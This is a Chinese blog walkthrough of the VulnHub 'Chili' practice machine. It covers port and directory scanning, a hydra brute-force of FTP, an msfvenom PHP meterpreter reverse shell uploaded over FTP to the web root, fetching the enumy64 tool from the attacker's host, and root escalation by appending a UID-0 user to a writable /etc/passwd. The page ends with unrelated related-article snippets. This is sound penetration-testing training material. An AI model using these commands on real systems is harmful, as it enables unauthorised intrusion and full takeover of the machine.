[vulnhub系列]Chili-靶机

已于 2023-05-08 09:32:06 修改
阅读量1.9k 收藏 33
点赞数 4
分类专栏: 靶机系列 文章标签: 安全 系统安全 网络安全
于 2023-03-07 21:50:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48539059/article/details/129392195
版权

[vulnhub系列]Chili-靶机

环境:下载靶机、解压、VMware打开,并将其和kali虚拟机的网络调成NAT模式

一.明确目标

探测目标主机IP情况

nmap 192.168.153.0/24

在这里插入图片描述

目标主机IP:192.168.153.150

Kali的P:192.168.153.129

二.信息收集

Nmap 进行常规端口开放扫描

进行namp全端口服务枚举

nmap  192.168.153.150 -p-  -A

在这里插入图片描述

发现开放了 ftp 21端口,http 80端口。

对该网站目录进行爆破枚举,利用到的是kali上的dirb:

dirb http://192.168.153.150

在这里插入图片描述

浏览器访问http://192.168.153.150/index.html

发现没有什么可以利用的。
在这里插入图片描述

再使用nikto命令爆破网站目录:

nikto -h 192.168.153.150

在这里插入图片描述

没啥东西可以查看滴

再换gobuster命令尝试:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x html -u http://192.168.153.150

在这里插入图片描述

发现也没啥东西!!

于是尝试ftp 21端口爆破,试试使用用户名chili进行密码爆破。

使用九头蛇hydra:

hydra -l chili -P webshell.txt ftp://192.168.153.150

在这里插入图片描述

爆破成功,得到ftp用户名:chili 密码:a1b2c3d4

kali中进行ftp登录

ftp 192.168.153.150

在这里插入图片描述

成功登录到ftp。

进入cd /var/www/html目录下,发现了.nano文件夹有读,写,执行权限。
在这里插入图片描述

生成反弹shell脚本

使用命令:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.153.129(kali的IP地址) LPORT=4567   R>shell.php
 
 
方法二补充:(这里可以直接利用 Kali 自带的 php-shell,修改$ip和$port。/usr/share/webshells/php/php-reverse-shell.php)

生成php反弹shell脚本.
在这里插入图片描述

利用 put 命令,尝试上传 shell 到 .nano 目录中

put shell.php  /var/www/html/.nano/shell.php

在这里插入图片描述

给shell.php文件权限,使用chmod命令

chmod  777  shell.php

在这里插入图片描述

三.反弹shell

启动msf,使用payload为之前生成后门所用的payload,之后访问http://192.168.153.150shell.php,顺利反弹shell;

msfconsole

在这里插入图片描述

设置Kali的IP,以及设置生成shell.php所使用的端口4567,然后运行。
在这里插入图片描述

在浏览器中访问http://192.168.153.150/.nano/shell.php,Kali中顺利反弹shell。

再输入shell

shell

在这里插入图片描述

python3 -c "import  pty;pty.spawn('/bin/bash')"   显示当前路径

(注:SHELL=/bin/bash script -q /dev/null 也可以获得一个交互式 shell)

四.提权

成功拿到靶机的webshell,但是权限不高,我们得进行提权
在这里插入图片描述

这里会用到一个工具 enumy64:是一款linux后渗透提权枚举工具,是一个快速的可移植、可执行文件
下载地址:https://github.com/luke-goddard/enumy/releases
直接下载enumy64然后放到kali里即可
然后我们使用wget下载到靶机。

首先在Kali中开启网站服务

python3 -m http.server

在这里插入图片描述

wget 192.168.153.129:8000/enumy64

在这里插入图片描述

给其权限,使用chmod命令,再./enumy64运行

chmod 777 enumy64
./enumy64

在这里插入图片描述

运行后得到信息:
在这里插入图片描述

通过以上信息,我们发现我们对/etc/passwd文件有写的权限,这里我们可以直接写入一个高权限用户,然后进行登录。

  • 先通过perl语言生成test用户的密码密文
/var/www/html/.nano$ /usr/bin/perl -le 'print crypt("123456","salt")'

  原密码:123456

  盐值:salt

  加密密码sahL5d5V.UWtI

在这里插入图片描述使用命令:/usr/bin/perl -le ‘print crypt(“123456”,“salt”)’,这个命令为使用perl脚本语言,执行crypt模块,将salt加密字符串输出;

使用命令:echo “test:sahL5d5V.UWtI:0:0:root:/root:/bin/bash” >> /etc/passwd
在passwd文件中,写入test账户信息

然后su命令切换用户test
在这里插入图片描述

id发现是root用户,提权成功!!!!!

五.总结

在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。
以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;

提权操作:用到一个工具 enumy64:是一款linux后渗透提权枚举工具 (利用 /etc/passwd 文件) 该实验中使用passwd文件可执行权限,给予普通用户root权限,设置普通用户UID,GID均为0;

gaynell
关注
  • 4
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
网站域名被DNS劫持了怎么办?dns被劫持了怎么处理
seven9711的博客
12-24 1900
域名劫持是互联网攻击的一种方式,通过攻击域名解析服务器(DNS),或伪造域名解析服务器(DNS)的方法,把目标网站域名解析到错误的地址,其效果就是对特定的网址不能访问或访问的是假网址。 域名劫持就是在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则直接返回假的IP地址或者什么也不做使得请求失去响应,其效果就是对特定的网址不能访问或访问的是假网址。 域名劫持一方面可能影响用户的正常体验,用户被引到假冒的网站进而无法正常浏览网页。用户量较大的网站域名被劫持后恶劣影响会不断扩大,
chili-cookoff
05-02
5. **版本控制**:项目名称以"chili-cookoff-master"结尾,暗示它可能来自GitHub,其中"master"是主分支,表明项目使用Git进行版本控制。版本控制对于协作开发和代码管理至关重要。 6. **测试**:虽然描述中没有...
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1188
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
Vulnhub---chili
从不专注的人的博客
06-11 387
Vulnhubchili 靶机下载地址:http://www.vulnhub.com/entry/chili-1,558/ 信息收集 扫描网段 nmap -sP 172.16.58.0/24 扫描端口信息及版本信息 nmap -p- 172.16.58.137 nmap -sV 172.16.58.137 访问网站 这里我们访问网页源代码,捕捉到了有用的信息 我们使用cewl工具对网页信息进行爬取并保存到文件中,并将文件中的信息大小写复写,以此作为用户名字典 cewl http://192.1
Vulnhub 靶机: ICA: 1
weixin_69670995的博客
05-13 961
进入root目录,查看root.txt文件,这里我使用的是tac命令查看的root.txt文件,因为使用cat命令,会直接执行我们伪造的cat程序,所有我使用的是tac命令,也可以将我们伪造的cat程序删除,就可以使用cat命令执行了。扫描出来的东西很多,使用浏览器访问一下目录,没有什么有用的信息,查看一下首页的源代码,也没有什么有用的信息,一时间没有什么思路,在页面上看到是"qdPM9.2"框架,查看一下kali上有没有这个框架的漏洞。发现开着22,80,3360,使用浏览器访问80端口。
chili靶机
weixin_51559599的博客
10-04 282
拥有 /etc/passwd 文件写入权限时,新建 root 用户加密密码可用计算其他版本 linux(kali)同样适用[外链图片转存中...(img-wQCb2ShY-1696401537110)]提权成功拥有 /etc/passwd 文件写入权限时,新建 root 用户加密密码可用计算其他版本 linux(kali)同样适用。
vulnhubchili
鲨鱼辣椒的博客
06-08 260
信息搜集 扫描网段 扫描
火辣的 KDE Plasma 登录主题:Chili
最新发布
gitblog_00043的博客
06-02 376
火辣的 KDE Plasma 登录主题:Chili 项目地址:https://gitcode.com/MarianArlt/kde-plasma-chili 在 Linux 桌面世界中,找到一个既美观又实用的登录界面并非易事,但 Chili 登录主题为 KDE Plasma 用户带来了这一可能。Chili 简洁而不失现代感,以其独特的设计和卓越的功能,为你的桌面体验增添一抹热辣。 项目介绍 Ch...
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2367
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5430
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
Vulhub靶机合集
Aiwin的博客
07-21 603
Vulhub靶机合集(持续记录)
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2013
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
chili-sensor
04-01
入门 正在安装 您可能需要 跑步 使用以下内容创建/arduino_secrets.h # define SECRET_SSID " your network name " # define SECRET_PASS " your password
grupo_8_red-hot-chili-guitars
04-04
grupo_8_red-hot-chili-guitars 积分: 卢卡斯·赫兰(Lucas Herlan) 马蒂亚斯·冈萨雷斯(MatíasGonzalez) 达里奥·玛玛尼(DaríoMamani) 塞巴斯蒂安·克拉维克(Sebastian Krawiec) tablero de trello:...
chili-cookoff:2015 年 Post Graphics 辣椒烹饪大赛
06-29
辣椒烤燃 2015 年 Post Graphics 辣椒烹饪大赛 我们正在为我们的辣椒烹饪构建一个应用程序! 我们之前都没有写过 Node 应用程序! 我们在烹饪开始前 23 小时就开始了! 甚至什么是玉。...cd chili npm install
jquery插件Chili-2.2改进版
02-03
官方下载地址是:http://code.google.com/p/jquery-chili-js/。 官方提供的下载包能够很好地对javascript、php、sql、css、html、C++、C#、Delphi、java、locus这十种开发语言进行语法高亮。鉴于asp/vbscript也是一...
VulnHub渗透测试实战靶场 - CHILI:1
LYJ20010728的博客
08-20 1154
VulnHub渗透测试实战靶场 - CHILI:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.138 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65
vulnhubChili 靶机
Nicky_Zheng的博客
01-29 726
1、信息收集 1.1、端口扫描 已通过netdiscover发现靶机 ip:192.168.57.142 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 17:11 CST Nmap scan report for 192.168.57.142 Host
靶机vulnhub靶机clover:1
weixin_52450702的博客
02-02 519
靶机vulnhub靶机clover:1,附post传参时间注入。
portainer查看命名空间
08-11
根据提供的引用内容,可以看到Portainer是一个用于管理Docker容器的工具。通过运行`docker ps`命令,可以查看Portainer Server容器的运行状态和相关信息。此外,Portainer还提供了一个Web界面,可以通过打开Web浏览器并转到特定地址来登录Portainer服务器实例。123 #### 引用[.reference_title] - *1* [Docker与Docker Compose的安装以及Portainer容器管理工具](https://blog.csdn.net/fbbqt/article/details/127408356)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] - *2* *3* [Docker图形化界面工具Portainer最佳实践](https://blog.csdn.net/shark_chili3007/article/details/123366179)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值